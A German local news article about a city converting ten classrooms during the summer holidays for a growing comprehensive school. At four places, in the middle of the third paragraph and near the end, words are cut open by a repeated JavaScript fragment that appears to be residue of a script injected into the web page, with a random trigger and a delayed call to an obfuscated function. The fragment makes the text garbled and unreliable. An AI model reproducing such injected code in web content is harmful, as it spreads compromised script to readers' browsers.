Gesamtschule Rietberg wächst und das Schulzentrum wird umgebaut

Staub und Dreck haben Einzug gehalten in das Rietberger Schulzentrum. Die Stadtverwaltung nutzt die Sommerferien einmal mehr, um die Klassenräume an die Bedürfnisse der Gesamtschule anzupassen.

Die im Aufbau befindliche Richard-von-Weizsäcker-Gesamtschule der Stadt Rietberg bekommt Jahr für Jahr eine neue Altersklasse hinzu. Nach den Sommerferien wird sie erstmals vier Jahrgangsstufen mit rund 630 Schülerinnen und Schülern betreuen. Dafür sind zusätzliche Klassenräume nötig. Die kann die Realschule im gleichen Schulzentrum abgeben, denn die läuft bekanntlich aus. Nach den Schulferien besuchen nur noch die Klassen Neun und Zehn die Städtische Realschule Rietberg.

Für die andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andere Schulform müssen einige Räume vergrößert werden, andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andere werden andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anders genutzt. Insgesamt werden im ersten und zweiten Obergeschoss des Schulzentrums derzeit zehn Klassenzimmer umgebaut. Aus dem ehemaligen Textilraum wird beispielsweise ein Teamraum für die Lehrer der Klassen 7 und 8. Ein EDV-Raum wird verlegt und die Einrichtung muss neu angeschlossen werden.

Schulzentrum04

Einzelne Klassenräume wurden komplett entkernt und bekommen mithilfe neuer Wände einen neuen Zuschnitt. Foto: Stadt Rietberg

Neue Wände, neue Fußböden, neuer Anstrich – die Klassenzimmer werden am Ende der Schulferien nicht wiederzuerkennen sein. Denn nur so lange reicht das Zeitfenster, um die Arbeiten in den Bereichen Trockenbau, Fliesen, Maler, Bodenbelag und Elektro abzuschließen.

„Das kriegen wir aber hin“, sagt Christina Fahrendorf von der Abteilung Hochbau im Rietberger Rathaus optimistisch. Es ist schließlich nicht die erste Umbaumaßnahme im Schulzentrum. In den Sommerferien der vergangenen Jahre sind immer wieder Klassenräume und Flure in Größe und Zuschnitt verändert und an die gewandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andelten Bedarfe angepasst worden. In diesem Jahr stehen für die genannten Umbaumaßnahmen 130.000 Euro im städtischen Haushalt bereit.

Titelbild: Christina Fahrendorf koordiniert die Arbeiten in der Baustelle Schulzentrum. Foto: Stadt Rietberg